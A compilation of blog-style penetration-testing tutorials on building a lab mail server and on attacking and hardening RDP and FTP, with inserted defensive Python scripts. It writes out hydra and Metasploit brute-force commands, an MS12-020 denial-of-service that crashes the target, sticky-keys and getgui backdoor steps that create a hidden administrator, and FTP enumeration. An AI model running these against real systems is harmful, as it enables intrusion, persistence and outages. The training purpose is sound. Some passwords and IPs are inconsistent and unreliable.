Channel: Hacking Articles|Raj Chandel's Blog

How to Setup Mail Server for Penetration Testing using hMail

SMTP stands for Simple Mail Transfer Protocol. Communication between mail servers uses TCP port 25; mail clients, on the other hand, often submit outgoing email to a mail server on port 587. For retrieving messages, client applications usually use either IMAP or POP3.

POP3 (Post Office Protocol version 3) is an application-layer Internet standard protocol used by local e-mail clients to retrieve e-mail from a remote server over a TCP/IP connection. It uses port 110 for receiving mail.

IMAP (Internet Message Access Protocol) is also an Internet standard protocol used by e-mail clients to retrieve e-mail messages from a mail server over a TCP/IP connection. It uses port 143 for receiving mail.

Let's start!!

Configure a static IP in your network for the SMTP server as shown below.


Download hMailServer and install it on your system (Windows). The installation program will create an hMailServer user with administrative rights; here you need to set the administrator password so that you can manage the installation.






You can use nmap to check whether SMTP, together with the other services IMAP and POP3, is running successfully on the remote system (192.168.1.104).
nmap 192.168.1.104
From the given image you can observe that all three services, SMTP, POP3 and IMAP, are running on ports 25, 110 and 143 respectively.
A new port, 587, will also be opened for submission (outgoing SMTP mail).


After logging into hMailServer it will ask you to add a domain name, so click on Add domain.

Enter a domain name of your choice, such as pentestlab.local, and tick the Enable check box.
Finally click on Save, which creates the domain “pentestlab.local” in hMailServer.


From the given image you can observe that pentestlab.local has been created in the left panel. Next click on Accounts in order to create a new user for your mail server.
Click on Add

Now follow the steps given below to create a user for your own mail server.
Address: username (info)
Password: give a password for the username
Tick the check box for Enable
Click on Save
Repeat the steps to create more users for the mail server.


From the given image you can see I had created three users; for a mail server you should create at least two accounts, one account for the sender and the other for the receiver.


Select all three protocols, SMTP, POP3 and IMAP, as shown in the image.

Click on SMTP in the left panel, select the Advanced option and type your IP “192.168.1.104” to bind your local IP to the mail server.


Then select the Advanced option in the left panel, type your domain name (for example pentestlab.local) as the default domain and click on Save.


Select Auto-ban under Advanced in the left panel and uncheck Enable for auto-ban.


Now open the hosts file from the path system32 > drivers > etc > hosts
Add your IP (192.168.0.104) with the domain name (pentestlab.local) as shown in the given image.


Now use two different systems in your local network to send mail through the server.

System 1st

Open Microsoft Outlook and select the option Add account.
Click the radio button for “Manual setup or additional server types”
Click on Next.


Click the radio button to choose the service, IMAP or POP, and click on Next.


Enter the mail server information for setting up your account as given below:
User information
·         Your name: info
·         Your email: info@pentestlab.local (provide an email ID which you have created as an hMailServer account.)
Server information
·         Account type: POP3
·         Incoming mail server:  192.168.0.104
·         Outgoing mail server: 192.168.0.104
Logon information
·         Username: info@pentestlab.local
·         Password: ******


Click on More Settings, choose the Outgoing Server tab and enable the following options:
·         My outgoing server (SMTP) requires authentication
·         Use same settings as my incoming mail server

Click on OK

To verify the server settings for the account, click on “Test Account Settings”.
From the given image you can observe that it shows green ticks for both tasks with status “Completed”. It would show status “Failed” if it found any error in the account settings.


System 2nd
Open Microsoft Outlook, select the option Add account and repeat the above steps for the mail server account settings.
Note: you now have two different accounts on two different systems in the same local network, as sender and receiver.

Now we test our mail server by sending mail from one system to the other with different accounts.

Here we are sending a message from system 1 to system 2 through Microsoft Outlook. You can also use another mail client for account setup and sending mail, for example Thunderbird.


Open the raj account on the 2nd system and verify whether the user has received any mail from the sender info or not. From the given image you can see we have successfully received the mail in the raj account.

In this way you can configure your own mail server for a local network.
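The same round trip that Outlook performs above (submit on port 587 with authentication, then fetch from the receiver's mailbox over POP3 on port 110) can be scripted with the Python standard library, which is handy for re-checking the lab server after every configuration change. This is an added example, not code from the original article or from hMailServer; the server IP, the two accounts and their passwords are assumptions matching the lab built above and must be adjusted.

```python
"""Round-trip check for a lab mail server: submit a message over SMTP
(port 587, authenticated) and confirm it arrives via POP3 (port 110).
Added example, not part of the original article; host and account
names are assumptions matching the lab built above."""
import email
import email.utils
import poplib
import smtplib
import time
from email.message import EmailMessage

MAIL_HOST = "192.168.1.104"   # assumption: the hMailServer IP used in the article
SMTP_PORT = 587               # submission port that hMailServer opens
POP3_PORT = 110
SENDER = ("info@pentestlab.local", "CHANGE_ME")    # assumption: accounts created above
RECEIVER = ("raj@pentestlab.local", "CHANGE_ME")


def build_message(sender, recipient, subject, body):
    """Build a minimal RFC 5322 message with a unique Message-ID so the
    delivered copy can be recognised on the POP3 side."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = recipient
    msg["Subject"] = subject
    msg["Date"] = email.utils.formatdate(localtime=True)
    msg["Message-ID"] = email.utils.make_msgid(domain=sender.split("@", 1)[1])
    msg.set_content(body)
    return msg


def submit(msg, host, port, user, password):
    """Submit over the submission port with authentication, upgrading to
    STARTTLS when the server advertises it so the password is not sent in clear."""
    with smtplib.SMTP(host, port, timeout=10) as smtp:
        smtp.ehlo()
        if smtp.has_extn("starttls"):
            smtp.starttls()
            smtp.ehlo()
        smtp.login(user, password)
        smtp.send_message(msg)


def find_in_pop3(host, port, user, password, message_id, attempts=5, delay=2):
    """Poll the recipient mailbox over POP3 until a message with the given
    Message-ID appears; returns the parsed message or None."""
    for _ in range(attempts):
        pop = poplib.POP3(host, port, timeout=10)
        try:
            pop.user(user)
            pop.pass_(password)
            count, _size = pop.stat()
            for i in range(1, count + 1):
                _resp, lines, _octets = pop.retr(i)
                parsed = email.message_from_bytes(b"\r\n".join(lines))
                if parsed["Message-ID"] == message_id:
                    return parsed
        finally:
            pop.quit()
        time.sleep(delay)
    return None


def message_ids_match(sent, received):
    """True when the received message is the one that was sent."""
    return received is not None and received["Message-ID"] == sent["Message-ID"]


if __name__ == "__main__":
    msg = build_message(SENDER[0], RECEIVER[0], "lab round-trip", "hello from system 1")
    submit(msg, MAIL_HOST, SMTP_PORT, *SENDER)
    got = find_in_pop3(MAIL_HOST, POP3_PORT, *RECEIVER, msg["Message-ID"])
    print("delivered" if message_ids_match(msg, got) else "NOT delivered")
```

If `submit` raises an authentication error on port 587 while Outlook works, compare the Outlook "requires authentication" setting above with what hMailServer's SMTP settings allow; if the STARTTLS upgrade is skipped, the server is not advertising it and credentials cross the LAN in clear text, which is acceptable only in an isolated lab.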


Penetration Testing on Remote Desktop (Port 3389)

In this article we discuss Remote Desktop penetration testing in four scenarios. Through them we try to explain how an attacker can breach security in different scenarios and what major steps an admin should take when activating RDP services to resist such attacks.

Remote Desktop Protocol (RDP) also known as "Terminal Services Client" is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. RDP servers are built into Windows operating systems; by default, the server listens on TCP port 3389.  

For more details visit Wikipedia.org

Let's start!!!


Suppose the admin has allowed the remote desktop service on his system for local network connections.


Scanning RDP with nmap

An attacker may use nmap to verify whether port 3389 is active or not. For RDP penetration testing we also use nmap to scan the targeted system (192.168.0.102) for an open RDP port.
nmap -p 3389 192.168.0.102


If the remote desktop service is allowed, nmap will show OPEN as the state for port 3389, as shown in the given image.

Brute force attack on RDP

In order to connect with RDP we always need login credentials for an authenticated connection. A valid user can enter his username and password, but an invalid user (attacker) cannot guess the correct credentials for login, so they retrieve credentials through a brute force attack.

We are using hydra to demonstrate a brute force attack on RDP.

Hydra: It is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely.

Open a terminal in your Kali Linux and type the following command:
hydra -v -f -l ignite -P /root/Desktop/dict.txt rdp://192.168.0.102

From the image given below you can read the username: ignite and password: 123456, which we have retrieved through the brute force attack on port 3389.

Using these credentials an attacker can log in to the Remote Desktop service.


Add security policy against brute force

An admin can protect the network from brute force attacks using an Account lockout policy. Configure the following policies under Security Settings > Account Policies > Account Lockout Policy

Account lockout duration: defines the time period that a locked-out account remains locked before it is automatically unlocked or reset by the admin. The account is locked for the specified time when a user exceeds the number of login attempts set by the account lockout threshold.

Account lockout threshold: defines the number of failed logon attempts after which the account is locked for the period specified by Account lockout duration. It allows the specified maximum number of attempts to sign in to your account.

Reset account lockout counter after: defines the time period that must elapse after a failed logon attempt before the failed-attempt counter is reset to zero. The reset time must be less than or equal to the Account lockout duration.


Account lockout duration: 30 minutes
Account lockout threshold: 2 invalid logon attempts
Reset account lockout counter after: 30 minutes

If the number of attempts is greater than the value of Account lockout threshold, the attacker could potentially lock every account.


Now let's test the Account lockout policy by again making a brute force attack on port 3389.

hydra -v -f -l ignite -P /root/Desktop/dict.txt rdp://192.168.0.102

When the attacker retrieves the username and password, he will surely use them for login, but as you can see it took more than 2 attempts to crack the password; therefore, according to the set policies, the account should get locked for 30 minutes.


Let's confirm it by logging into the remote desktop.

Open the terminal and type “rdesktop 192.168.0.102”; when you get the target's login screen, enter the username and password retrieved through the brute force attack.

From the given image you can observe that we have entered the above discovered username and password ignite: 12345.



When you (the attacker) submit your credentials, it will show a message that the current account has been locked out and cannot log on, as shown in the given image.

This will lock the account of the user ignite for 30 minutes, and hence the admin will come to know that someone has attempted a brute force attack for unauthorized access.

In this way we can protect against brute force attacks for unauthorized access.
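The three lockout values interact in a way that is easier to see when modelled than when read: the threshold counts failures inside the reset window, the lockout holds even a correct password out until the duration elapses, and a reset time longer than the duration is not a valid policy. The model below replays a password list against the policy configured above (threshold 2, duration 30 minutes, reset after 30 minutes). It is an added example, not code from the original article, and it models the policy's semantics rather than Windows itself; the account name, the guesses and the timings are constructed.

```python
"""Model of the account lockout policy configured above (threshold 2,
lockout duration 30 minutes, reset counter after 30 minutes) so the
behaviour against a password list can be reasoned about. Added example,
not part of the article; it models the policy semantics, not Windows itself."""
from collections import defaultdict

LOCKOUT_THRESHOLD = 2          # invalid logon attempts (from the article)
LOCKOUT_DURATION = 30 * 60     # seconds
RESET_COUNTER_AFTER = 30 * 60  # seconds; must be <= LOCKOUT_DURATION


class LockoutPolicy:
    def __init__(self, threshold=LOCKOUT_THRESHOLD, duration=LOCKOUT_DURATION,
                 reset_after=RESET_COUNTER_AFTER):
        if reset_after > duration:
            raise ValueError("reset counter must be <= lockout duration")
        self.threshold, self.duration, self.reset_after = threshold, duration, reset_after
        self._failures = defaultdict(int)  # account -> bad-password count
        self._last_failure = {}            # account -> time of the last failure
        self._locked_until = {}            # account -> time the lock expires

    def is_locked(self, account, now):
        return self._locked_until.get(account, 0) > now

    def attempt(self, account, password_ok, now):
        """Process one logon attempt at time `now` (seconds) and return
        'ok', 'failed' or 'locked'. A locked account rejects even the
        correct password until the duration has elapsed."""
        if self.is_locked(account, now):
            return "locked"
        if password_ok:
            self._failures[account] = 0
            return "ok"
        last = self._last_failure.get(account)
        if last is not None and now - last >= self.reset_after:
            self._failures[account] = 0  # observation window expired
        self._failures[account] += 1
        self._last_failure[account] = now
        if self._failures[account] >= self.threshold:
            self._locked_until[account] = now + self.duration
            self._failures[account] = 0
            return "locked"
        return "failed"


def simulate_guessing(policy, account, guesses, real_password, start=0, step=1):
    """Replay a wordlist one guess per `step` seconds, the way hydra above did,
    and return the per-guess outcome. Once the threshold is hit, a later
    correct guess is still reported as 'locked': the password has been found
    but cannot be used, and the lockout itself is visible to the admin."""
    return [policy.attempt(account, guess == real_password, start + i * step)
            for i, guess in enumerate(guesses)]


if __name__ == "__main__":
    policy = LockoutPolicy()   # constructed run: third guess is the real password
    print(simulate_guessing(policy, "ignite", ["password", "letmein", "123456"], "123456"))
    print("locked now:", policy.is_locked("ignite", 2),
          "locked after 30 min:", policy.is_locked("ignite", 2 + LOCKOUT_DURATION))
```

The second outcome of the replay shows the point the article's own caveat makes: a low threshold that stops the attacker also lets anyone who can reach port 3389 lock arbitrary accounts, so the threshold is a trade-off rather than a free win. On the Windows side the corresponding Security log events are 4625 (failed logon) and 4740 (account locked out); a burst of 4625 followed by 4740 from one source is the trace this scenario leaves.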


Scan port 3389 for DOS attack

Many times, in order to identify whether a host is vulnerable through RDP or not, an attacker uses the MS12-020 check to test it.
Open the terminal in your Kali Linux, load the Metasploit framework and type the following commands to scan for the vulnerability.

use auxiliary/scanner/rdp/ms12_020_check
msf auxiliary(ms12_020_check) > set rhosts 192.168.0.102
msf auxiliary(ms12_020_check) > set rport 3389
msf auxiliary(ms12_020_check) > exploit

From the given image you can see it shows the target is vulnerable; now you can use Google to find an exploit for it.


Once an attacker knows that the target's port 3389 is vulnerable according to the MS12-020 check, he will surely try an attack with ms12_020_maxchannelids, which launches a DOS attack on the target system.

Now type the following commands for the DOS attack, which will crash the system.

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > set rhost 192.168.0.102
msf auxiliary(ms12_020_maxchannelids) > set rport 3389
msf auxiliary(ms12_020_maxchannelids) > exploit


From the image given below you can notice that the target system is shutting down due to a problem.

Criminal perpetrators of DoS attacks often target sites or services hosted on high-profile web servers such as banks or credit card payment gateways, to make a machine or network resource unavailable to its intended users by temporarily or indefinitely disrupting the services of a host connected to the Internet.


Enable RDP in Victim's PC (2nd Scenario)

If an attacker has hacked the victim's system and the RDP service is not enabled, the attacker can activate this service himself using a post-exploitation module built by Rapid7 inside Metasploit.

To perform this we need a meterpreter session on the target system. From the given image you can notice that we already have a meterpreter session on the target system.

Here we have meterpreter session 1 through multi/handler and session 2 from bypassuac for admin privileges.


Now type the following commands to run the post-exploitation module that enables the RDP service (the module needs the session with admin privileges, here session 2).

use post/windows/manage/enable_rdp
msf post(enable_rdp) > sessions
msf post(enable_rdp) > set session 2
msf post(enable_rdp) > exploit


This module makes it possible to apply the 'sticky keys' hack to a session with appropriate rights. The hack provides a means to get a SYSTEM shell using UI-level interaction at an RDP login screen or via a UAC confirmation dialog.

use post/windows/manage/sticky_keys
msf post(sticky_keys) > sessions
msf post(sticky_keys) > set session 2
msf post(sticky_keys) > exploit


Now connect with remote desktop using the following command:
rdesktop 192.168.0.102


It will ask for credentials to log in, but we are not aware of them; therefore we launched the sticky keys attack above so that we can access the victim's command prompt by hitting the Shift key 5 times, as shown in the given image.


Another way to enable RDP

When you hold a meterpreter session on the victim's system, type the following command, which enables the RDP service and also sets credentials of your own choice.

meterpreter > run getgui -e -u raaz -p 1234

From the given image you can observe it has added the user raaz with password 12345 to “Remote Desktop Users” and to “Administrators”. Now you can log in with the created user; connect with remote desktop using the following command:

rdesktop 192.168.0.102


Enter username: raaz and password: 1234 to log in.


Awesome!!! We have successfully logged into the remote system.
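Both post-exploitation steps in this scenario leave a footprint an admin can check for: enabling RDP flips the fDenyTSConnections value under the Terminal Server key, and the sticky keys trick registers a debugger for an accessibility binary under Image File Execution Options, so that the program started from the logon screen is replaced by a shell. The audit below checks exactly those two locations. It is an added example, not code from the article or from Metasploit; the two snapshot dictionaries are constructed, and on a Windows host the same check runs against the live registry.

```python
"""Audit the two Windows settings the post-exploitation steps above change:
the RDP enable flag (fDenyTSConnections) and an Image File Execution Options
debugger on the accessibility binaries, which is how the 'sticky keys' trick
gets a shell from the logon screen. Added example, not the article's code;
the snapshot dictionaries are constructed, and on Windows the same check can
be run against the live registry."""

# Well-known HKLM-relative key paths
TERMINAL_SERVER = r"SYSTEM\CurrentControlSet\Control\Terminal Server"
IFEO = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
ACCESSIBILITY_BINARIES = ("sethc.exe", "utilman.exe", "osk.exe",
                          "narrator.exe", "magnify.exe", "displayswitch.exe")

# Constructed snapshot of a host after enable_rdp + sticky_keys
COMPROMISED = {
    TERMINAL_SERVER: {"fDenyTSConnections": 0},
    IFEO + r"\sethc.exe": {"Debugger": r"C:\Windows\System32\cmd.exe"},
}
# Constructed snapshot of a host with RDP off and no debuggers registered
CLEAN = {
    TERMINAL_SERVER: {"fDenyTSConnections": 1},
}


def audit(snapshot, rdp_expected=False):
    """snapshot: {key_path: {value_name: data}}. Returns a list of findings.
    RDP being enabled is only a finding where the host is not meant to offer it."""
    findings = []
    deny = snapshot.get(TERMINAL_SERVER, {}).get("fDenyTSConnections")
    if deny == 0 and not rdp_expected:
        findings.append("RDP enabled: fDenyTSConnections=0 under " + TERMINAL_SERVER)
    for exe in ACCESSIBILITY_BINARIES:
        debugger = snapshot.get(IFEO + "\\" + exe, {}).get("Debugger")
        if debugger:
            findings.append(f"IFEO Debugger set for {exe}: {debugger}")
    return findings


def snapshot_from_registry():
    """Read the same keys from the live registry (Windows only)."""
    import winreg
    snap = {}
    paths = [TERMINAL_SERVER] + [IFEO + "\\" + exe for exe in ACCESSIBILITY_BINARIES]
    for path in paths:
        values = {}
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path) as key:
                for name in ("fDenyTSConnections", "Debugger"):
                    try:
                        values[name] = winreg.QueryValueEx(key, name)[0]
                    except FileNotFoundError:
                        pass
        except FileNotFoundError:
            continue
        snap[path] = values
    return snap


if __name__ == "__main__":
    import sys
    snap = snapshot_from_registry() if sys.platform == "win32" else COMPROMISED
    for finding in audit(snap) or ["no findings"]:
        print(finding)
```

A legitimate host never has a Debugger value on sethc.exe or utilman.exe, so that finding needs no baseline; fDenyTSConnections should be compared with the host's intended state, which is why the function takes `rdp_expected`.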


Port Forwarding (3rd Scenario)

You can move port 3389 to another port to increase system security. To do this on your Windows operating system, browse to the following location in the Registry Editor.

Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp

From the given image you can see that in the right panel PortNumber is highlighted; click on it.


Shift port from 3389 to a specific port number

You will get an Edit DWORD window where you can edit the 32-bit value. By default it shows d3d, which is the hexadecimal value for 3389.
Replace the value 3389 with another value of your choice, such as 3314, and select Hexadecimal as the base, which will show 3314 as cf2.


From the given image you can see port 3314 is open now.


Secure RDP through Windows Firewall (4th Scenario)

Open Windows Firewall with Advanced Security, then go to Inbound Rules and open Remote Desktop (TCP-In) for the domain profile in order to add a security filter by changing the firewall settings.


Allow traffic from specific IP

This opens a window for changing the rule's properties; click on Scope. Here you get two panels for the addresses of the connection being established: local and remote IP addresses.

In Remote IP address choose the 2nd option, for specific IP addresses, and enter the IP which you want to allow to connect to the remote desktop service, as shown in the given image.

This will block all traffic coming from other IPs and increase the security of your network against any kind of attack.


FTP Penetration Testing on Windows

Hello friends, today we are sharing tips and tricks on FTP attacks and security through FTP penetration testing, which will help you secure your server from any kind of FTP attack.
FTP stands for File Transfer Protocol, used for the transfer of computer files such as docs, PDFs, multimedia etc. between a client and server on a computer network via port 21. Port 21 is the default port which is opened when FTP is activated for sharing data.
Let's start!!
Install & Configure FTP Server on Windows 7

Firstly we are going to set up an FTP server on our Windows 7 for sharing files in a LAN. To accomplish that, open Control Panel > Programs > Programs and Features > Turn Windows features on or off, as shown below.

Here expand Internet Information Services and check the FTP Server option.
Also ensure that FTP Extensibility and FTP Service are both checked, as shown below, and click OK to begin the installation.
This installs IIS and the FTP Service Manager; be patient, it might take some time.


Configure FTP Site in IIS

Now to open IIS, open Control Panel, then System and Security, and then Administrative Tools. In Administrative Tools you will find IIS Manager, as shown below; open it.


The Internet Information Services (IIS) Manager window will come up; right-click Sites in the left panel under Connections and select Add FTP Site.
This will open a new window as shown below.

Enter a name of your choice for your FTP site; in the given image it is ignite.
Enter the path to the FTP folder you want to use to send and receive files. In our case, we created a folder named ftp at C:\ftp.
Then click Next.


Allow the following settings in Authentication and Authorization for your FTP site and then click on Finish.
Authentication: Basic
Authorization: specific users (pc7)
Permissions: Read and Write


In Binding and SSL Settings, we bind our IPv4 address to the server with the following settings, then click Next.
·         Enter IP: 192.168.1.128 and Port: 21.
·         Tick the check box for Start FTP site automatically
·         In the SSL option select No SSL and click Next.


From the given image you can see we have successfully configured the FTP server for Ignite. Now let's try to connect to it for sharing files.


Connect client to FTP Server through WinSCP

WinSCP is free software which is used to access the FTP server. You can download it from here.
File protocol: FTP
Encryption: No encryption
Host name: IP of the FTP server
Port: 21
Username and Password: Windows login credentials of the user.
Click on Login


As you can see, I have successfully connected to my FTP server, which has a file called demo.txt.


Scanning FTP with nmap
An attacker may use nmap to verify whether port 21 is active or not. For FTP penetration testing, we also use nmap to scan the targeted system (192.168.1.128) for an open FTP port.
nmap -p 21 192.168.1.128
If the file transfer service is allowed, nmap will show OPEN as the state for port 21, as shown in the given image.


Version Enumeration on FTP
Now let's try to get the FTP version through ftp_version in Metasploit.
Open the terminal in your Kali Linux, load the Metasploit framework and type the following commands to scan for the FTP version.
use auxiliary/scanner/ftp/ftp_version
msf auxiliary(ftp_version) > set rhosts 192.168.1.128
msf auxiliary(ftp_version) > exploit
From the given image you can see it is showing the target is vulnerable. So, let's protect it.


Hiding Banner
Open IIS Manager.
Click on Features View at the bottom of the window.


A new window for FTP Messages will come up where you can change the Message Behavior.

·         Enable Suppress default banner
·         Enable Show detailed messages for local requests

Now let's check whether our FTP version is still visible or not.


You can verify it by executing the following command in Kali Linux for an nmap version scan.
nmap -p 21 -sV 192.168.1.128
As you can see, our FTP version is no longer visible to anybody.


FTP Brute force Attack
Let's try a brute force attack on our FTP server using Metasploit.
Open the terminal in your Kali Linux, load the Metasploit framework and type the following commands to brute force the FTP login.
use auxiliary/scanner/ftp/ftp_login
msf auxiliary(ftp_login) > set rhosts 192.168.1.128
msf auxiliary(ftp_login) > set user_file /root/Desktop/user.txt
msf auxiliary(ftp_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(ftp_login) > set stop_on_success true
msf auxiliary(ftp_login) > exploit

From the given image you can observe that our FTP server is not secure against brute force attacks, because it shows a matching combination of username and password for login. So let's protect our FTP server against brute force.


Secure FTP server against Brute Force Attack
Open IIS Manager.
Now open FTP IPv4 Address and Domain Restrictions. Here we are going to allow only a particular IP address to access the FTP server, so that only the valid IP can connect to FTP.


Allow specific IP to connect FTP
Now follow the steps given below:
·         Click on FTP IPv4 Address and Domain Restrictions
·         Click on Add Allow Entry in the Actions tab in the right panel
·         Select Specific IP Address and enter the IP address
·         Click OK

Here you can also add a range of IPs of your network.


Restrict IPs to connect FTP
Now repeat the steps with some changes to deny other IPs access to the FTP service.
Now follow the steps given below:
·         Click on FTP IPv4 Address and Domain Restrictions
·         Click on Add Deny Entry in the Actions tab in the right panel
·         Select Specific IP Address and enter the IP address
·         Click OK

Hence, even if any other user or attacker finds out the credentials for FTP login, he cannot connect to the server.


Let's verify the above settings by brute forcing again in the same way as before. From the given image you can observe that it now reports an incorrect combination even for the correct credentials.


FTP Port Forwarding
You can move FTP from port 21 to another port to increase server security; to do this you need to open IIS.



Now click on Bindings in the Actions tab.
It will open a window, as shown below, showing that the FTP service is active on port 21; now click on Edit to change this port to another.


From the given image you can see we are now using port 5000 for the FTP service.


Now let's check using nmap
nmap -p 5000 -sV 192.168.1.128
As you can see, the FTP service has been shifted to port 5000.


Now, to verify that the service is actually running on port 5000, let's log into the FTP server using WinSCP, this time using port 5000 as shown below.


Great!!! We are successfully connected with the FTP server via port 5000.


FTP Log Monitoring
In IIS Manager we can also manage the logs of our FTP server.
Here we can schedule the logging and also manage the size and location of the logs.
To monitor the FTP logs, follow the steps given below:

Open FTP Logging in the Features View.
·         Format of log file: click on W3C Fields and then select the desired fields such as date, time, client IP etc.
·         Directory: browse to the location where you want to save the logs
·         Schedule: Daily


Now if you want to view the logs of the FTP server, open the directory which you chose for saving the logs, i.e. C:\inetpub\logs\LogFiles
From the given image you can observe the logs for FTP logins.
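The W3C log selected above is what turns the brute force attack from the earlier section into something detectable: every PASS command is logged with its status, and a burst of 530 responses from one client IP followed by a 230 is the trace a successful password guess leaves. The script below parses that format from its #Fields header and reports such bursts. It is an added example, not code from the original article or from IIS; the log lines embedded in it are constructed to look like FTP 7.5 output and are not a capture from the server in the article.

```python
"""Brute-force detection over IIS FTP W3C logs (the files the FTP Logging
feature writes under C:\\inetpub\\logs\\LogFiles). Added example, not part of
the original article; the log lines below are constructed for the demo."""
import sys
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in W3C extended format; 530 = login failed, 230 = logged in.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Version: 1.0
#Date: 2017-09-01 10:00:00
#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status sc-win32-status
2017-09-01 10:00:01 192.168.1.120 - USER pc7 331 0
2017-09-01 10:00:01 192.168.1.120 pc7 PASS *** 530 1326
2017-09-01 10:00:02 192.168.1.120 - USER pc7 331 0
2017-09-01 10:00:02 192.168.1.120 pc7 PASS *** 530 1326
2017-09-01 10:00:03 192.168.1.120 - USER admin 331 0
2017-09-01 10:00:03 192.168.1.120 admin PASS *** 530 1326
2017-09-01 10:00:04 192.168.1.120 - USER pc7 331 0
2017-09-01 10:00:04 192.168.1.120 pc7 PASS *** 230 0
2017-09-01 10:05:00 192.168.1.50 - USER pc7 331 0
2017-09-01 10:05:00 192.168.1.50 pc7 PASS *** 230 0
"""


def parse_w3c(text):
    """Yield one dict per data line, keyed by the names in the #Fields header
    (the header is re-read whenever it recurs, as it does across log rollover)."""
    fields = None
    for raw in text.splitlines():
        if raw.startswith("#Fields:"):
            fields = raw.split()[1:]
            continue
        if raw.startswith("#") or not raw.strip():
            continue
        if fields is None:
            raise ValueError("data line before any #Fields header")
        values = raw.split()
        if len(values) != len(fields):
            continue  # skip truncated lines rather than mis-assign columns
        yield dict(zip(fields, values))


def max_in_window(times, window):
    """Largest number of timestamps falling inside any span of length `window`."""
    times = sorted(times)
    best = start = 0
    for end in range(len(times)):
        while times[end] - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def detect_bruteforce(text, threshold=3, window=timedelta(minutes=2)):
    """Map client IP -> (peak failures within the window, username that later
    logged in from that IP or None) for every IP at or above the threshold.
    A success following a burst of failures is the trace a successful
    brute force leaves, so it is reported alongside the count."""
    failures = defaultdict(list)
    success_after = {}
    for rec in parse_w3c(text):
        if rec.get("cs-method") != "PASS":
            continue
        ts = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
        ip = rec["c-ip"]
        if rec["sc-status"] == "530":
            failures[ip].append(ts)
        elif rec["sc-status"] == "230" and failures[ip]:
            success_after[ip] = rec["cs-username"]
    alerts = {}
    for ip, times in failures.items():
        peak = max_in_window(times, window)
        if peak >= threshold:
            alerts[ip] = (peak, success_after.get(ip))
    return alerts


if __name__ == "__main__":
    # Usage: python ftp_bruteforce.py u_ex170901.log  (falls back to the sample)
    text = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE_LOG
    for ip, (count, user) in detect_bruteforce(text).items():
        tail = f", then logged in as {user}" if user else ""
        print(f"{ip}: {count} failed logins within 2 minutes{tail}")
```

Because the parser takes the column layout from the #Fields header rather than hard-coding positions, it keeps working when different fields are ticked in the W3C Fields dialog, as long as date, time, c-ip, cs-username, cs-method and sc-status remain selected.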





FTP Penetration Testing in Ubuntu

Welcome to internal penetration testing on an FTP server, where you will learn FTP installation and configuration, enumeration and attack, system security and precautions. As you know, File Transfer Protocol (FTP) is used for the transfer of computer files between a client and server in a network via port 21.

Let's start!!!

Requirement
FTP Server: Ubuntu
Attacker system: Kali Linux
Client system: Windows

FTP Installation

vsftpd stands for Very Secure FTP Daemon; it is an FTP server for Unix-like systems, including Linux.
Let's start by typing the following command to install vsftpd for the FTP service.
apt-get install vsftpd

This will start the FTP service on port 21.

FTP Scanning

Scanning plays an important role in penetration testing because through scanning the attacker finds out which services and open ports are available for enumeration and attack.

Here we are using nmap to scan port 21.

nmap -p 21 192.168.0.106

If the service is active on the targeted server, nmap shows open as the STATE for port 21.


Anonymous Login

FTP users may authenticate themselves with a clear-text sign-in protocol, normally in the form of a username and password, but can connect anonymously if the server is configured to allow it.

If anonymous login is allowed by the admin, anyone can log in to the FTP server. An attacker can easily check for anonymous login permission using the following Metasploit module.

use auxiliary/scanner/ftp/anonymous
msf auxiliary(anonymous) > set rhosts 192.168.0.106
msf auxiliary(anonymous) > exploit

From the given image you can observe that it shows READ permission from the FTP server.


Connect client to FTP Server through WinSCP

Now let's check whether we can connect to the FTP server as an anonymous user or not.
File protocol: FTP
Encryption: No encryption
Host name: IP of the FTP server
Port: 21
Username and Password: anonymous: anonymous
Click on Login


Ohh!! Great, we have got FTP access through the anonymous user.

Similarly an attacker can also get access to your FTP server; therefore it is quite important that the admin does not give the anonymous user any permission to log in to the server.


Disable Anonymous Login
In order to secure your server from anonymous user login, follow the steps given below:
·         Open vsftpd.conf
·         Set anonymous_enable=NO
·         service vsftpd restart


Now repeat the attack to check for anonymous login permission using Metasploit as above. This time the module will fail to find any anonymous login permission, which you can confirm from the image given below.


Enumerating FTP Banner
An attacker always performs enumeration to find important information such as the software version, which is known as banner grabbing, and then checks whether that version is vulnerable to any exploit.

Open the terminal in your Kali Linux, load the Metasploit framework and type the following commands to scan for the FTP version.

use auxiliary/scanner/ftp/ftp_version
msf auxiliary(ftp_version) > set rhosts 192.168.0.106
msf auxiliary(ftp_version) > exploit

From the given image you can read the highlighted text, which shows that vsftpd 3.0.2 is the installed version of FTP on the target's system.


Anyone connected with telnet can likewise identify the installed version of FTP, as shown in the given image.
telnet 192.168.0.106 21
Once an attacker has enumerated the FTP banner he will surely search for vulnerabilities and exploits for that version; therefore the admin should keep the banner hidden.

As we discussed above, banner grabbing can expose loopholes in any software or service running on a remote system; therefore, after installing any service, always hide its software version.

The admin should make the following changes in the configuration file to prevent banner disclosure.

·         Open the vsftpd.conf file
·         Enable the line “ftp_banner=Welcome to blah FTP service” by removing the # in front of it.


Now save the text file after the modification as shown in the given image; it will no longer disclose the version in the banner. Restart the service with the following command and re-scan.
service vsftpd restart
nmap -p 21 -sV 192.168.0.106

Wonderful!! We have succeeded in hiding the banner, which you can confirm from the given image.


Though the admin has hidden the banner and disabled the anonymous user, the attacker still has the potential to steal credentials for unauthorized access.

An attacker can use sniffing tools, which capture the data packets travelling between server and client in a network and retrieve credentials (this is known as sniffing), and then use them for unauthorized access. As we discussed above, FTP users authenticate with a clear-text sign-in protocol, sending username and password in plain text.

